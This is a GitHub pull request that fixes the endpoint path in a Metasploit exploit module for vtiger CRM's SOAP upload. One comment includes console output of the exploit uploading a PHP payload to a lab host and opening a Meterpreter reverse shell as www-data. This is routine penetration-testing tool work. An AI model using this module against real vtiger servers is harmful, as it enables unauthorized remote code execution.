Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

vtigerolservice.php to vtigerservice.php #2998

Merged
merged 1 commit into from Feb 20, 2014
Merged

vtigerolservice.php to vtigerservice.php #2998

merged 1 commit into from Feb 20, 2014

Conversation

bit4bit
Copy link
Contributor

@bit4bit bit4bit commented Feb 16, 2014

using direct soap/vtigerolservice.php not work..php need require('config.php');

@bit4bit
vtigerolservice.php to vtigerservice.php
74344d6 
using direct soap/vtigerolservice.php not work..php need require('config.php');
@wchen-r7
Copy link
Contributor

@jvazquez-r7 You might wanna verify this one.

@bit4bit
Copy link
Contributor Author

bit4bit commented Feb 16, 2014

yes, i test and work

@wvu
Copy link
Contributor

wvu commented Feb 18, 2014

Tested on what, specifically?

@jvazquez-r7
Copy link
Contributor

@bit4bit oooo my fault, had to tweak to make the SOAP interface to work, was thinking I had missed doing some configuration :( my bad. Testing and landing, thanks a lot @bit4bit !

jvazquez-r7 added a commit that referenced this pull request Feb 20, 2014
@jvazquez-r7
Land #2998, @bit4bit's fix for the vtigercrm exploit
998fa06
@jvazquez-r7 jvazquez-r7 merged commit 74344d6 into rapid7:master Feb 20, 2014
@jvazquez-r7
Copy link
Contributor

@bit4bit just did a couple of changes: 0b27cd1

  • Use vars_get in send_request_cgi
  • FIx the send_request_cgi uri when calling the payload

Now working smoothly:

msf exploit(vtiger_soap_upload) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.172.1:4444 
[*] 192.168.172.135:80 - Uploading payload...
[+] 192.168.172.135:80 - Upload successfully uploaded
[*] 192.168.172.135:80 - Executing payload...
[*] Sending stage (39848 bytes) to 192.168.172.135
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.135:33452) at 2014-02-20 08:35:09 -0600
[+] Deleted jecgbrDbIknmJE.php



^C[-] Exploit failed: Interrupt 

meterpreter > getuid
Server username: www-data (33)
meterpreter > exit
[*] Shutting down Meterpreter...

thanks a lot for the fix @bit4bit !

@wvu
Copy link
Contributor

wvu commented Feb 20, 2014

Okay, thanks!

@bit4bit
Copy link
Contributor Author

bit4bit commented Feb 20, 2014

community :)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@jvazquez-r7 jvazquez-r7

Labels
None yet
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
4 participants
@bit4bit @wchen-r7 @wvu @jvazquez-r7